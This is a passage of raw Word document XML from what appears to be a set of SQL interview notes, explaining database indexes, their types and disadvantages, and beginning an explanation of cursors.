      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>performance and speed</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of data retrieval operations on a database table. An index in a database is similar to an index in a book — it allows the database engine to find data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without scanning the entire table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29586E7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521723">
          <v:rect id="_x0000_i3253" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4091A3C4"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at is an Index?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E44715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n </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>index</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>database object</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> created on one or more columns of a table. It creates a </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>lookup table</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that the database can use to quickly locate rows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12BC057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04E69F7">
          <v:rect id="_x0000_i3254" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="522AACA7"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How Index Works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2E574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are typically implemented using </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>B-trees</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hash maps</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED681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When a query searches on indexed columns, the DB engine uses the index to go directly to the matching row, instead of scanning all rows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3644349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B43F0CF">
          <v:rect id="_x0000_i3255" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A2AC0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dvantages of Indexing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08AE1EE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Fast retrieval of data using SELECT queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE32F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mproved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WHERE</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> clause performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B3361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Helps in sorting (ORDER BY) and searching.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2E449B"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87A2B5C">
          <v:rect id="_x0000_i3256" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="400AAFA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750135C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take up additional </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>disk space</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A787E76"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on INSERT, UPDATE, and DELETE operations due to index maintenance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B98623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01DE5380">
          <v:rect id="_x0000_i3257" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FFBA5CC"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Indexes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2414859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Index</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Automatically created on the primary key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4254A1E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 Index</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Ensures that indexed column(s) have unique values.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D4FF47"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osite Index</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Created on two or more columns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D521C2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ustered Index</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Sorts the actual data rows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320E4049"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n-clustered Index</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Has a separate structure that points to the data rows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="121D8209" w14:textId="6CB36B71"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3258" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="799797AC" w14:textId="53B7D78A" w:rsidR="00205C15" w:rsidRPr="00CE4B95" w:rsidRDefault="00356F93">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="790" w:name="_Toc197868004"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What are the disadvantages of Index</w:t>
      </w:r>
      <w:r w:rsidR="00205C15" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="790"/>
    </w:p>
    <w:p w14:paraId="557E970A" w14:textId="2812A93F" w:rsidR="00AA35F5" w:rsidRPr="005C1C9E" w:rsidRDefault="00AA35F5"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are the </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>disadvantages of indexes</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in SQL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74754B2C"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91C9B61">
          <v:rect id="_x0000_i3259" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D1D071"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 of Indexing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="563669D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creased Disk Space Usage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0086974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dexes consume </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>additional storage</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the database, especially if multiple indexes are created on a table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4666272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lower Write Operations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F9E5E1"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SERT, UPDATE, and DELETE operations become </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>slower</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> because the indexes also need to be updated each time the data changes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F4C9B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aintenance Overhead</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51EA8D2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requent changes in indexed columns can lead to </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>fragmentation</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, requiring </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>index rebuilding</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reorganization</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to maintain performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E35E2B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oo Many Indexes Can Hurt Performance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64466BC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aving too many indexes can cause the </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>query optimizer</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to choose a suboptimal index, affecting performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA0A194"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lso increases </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>complexity in tuning</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39639C2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t Useful for Small Tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D699773"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r small tables, a </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>full table scan</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is often faster than using an index due to minimal I/O.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E3DB1D"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dexes Are Not Always Used</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E59B43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f queries don’t match the indexed columns properly, indexes are </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ignored</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, making them </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>useless overhead</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C1CCA1" w14:textId="02DDF53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3260" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0342D13C" w14:textId="1983BB08" w:rsidR="00205C15" w:rsidRPr="00CE4B95" w:rsidRDefault="00AA35F5">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="791" w:name="_Toc197868005"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain Cursor</w:t>
      </w:r>
      <w:r w:rsidR="00205C15" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="791"/>
    </w:p>
    <w:p w14:paraId="056DDA66" w14:textId="6D1E9E9B" w:rsidR="008B7C75" w:rsidRPr="005C1C9E" w:rsidRDefault="008B7C75" w:rsidP="00FC2EFF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="710"/>
        </w:num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Cursor in SQL – Explained</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62603BC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ursor</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a database object used to </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>retrieve, manipulate, and traverse</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> through the </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>result set</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of a query </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>row by row</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E2B23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6BEF145">
          <v:rect id="_x0000_i3261" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="33DAB44E"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y Use a Cursor?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6843D8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 SQL, operations are usually set-based (they work on multiple rows at once). But sometimes, you may need to process each row </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>individually</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, such as:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC7EC0B"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Performing </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>row-wise logic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B72B5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alling </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>stored procedures per row</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1306EED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ow-by-row computation</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> not possible with standard SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0685F4"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63ADF2D">
          <v:rect id="_x0000_i3262" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="714DAA2B"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6909"/>
      </w:tblGrid>
      <w:tr w:rsidR="008B7C75" w:rsidRPr="005C1C9E" w14:paraId="17B17E09" w14:textId="77777777" w:rsidTr="008B7C75">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4B862D3B"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ype</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="758202C7"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scription</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008B7C75" w:rsidRPr="005C1C9E" w14:paraId="23198EBB" w14:textId="77777777" w:rsidTr="008B7C75">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0F3CEEE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tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2FA68A6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the database for SELECT, INSERT, UPDATE, DELETE.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008B7C75" w:rsidRPr="005C1C9E" w14:paraId="367398A7" w14:textId="77777777" w:rsidTr="008B7C75">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="26855D93"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tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6563885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clared and controlled by the programmer.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0BB406FA"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B90859B">
          <v:rect id="_x0000_i3263" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="147C632A"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teps to Use an Explicit Cursor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F4FA8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e</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the cursor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3BF6B2"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pen</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
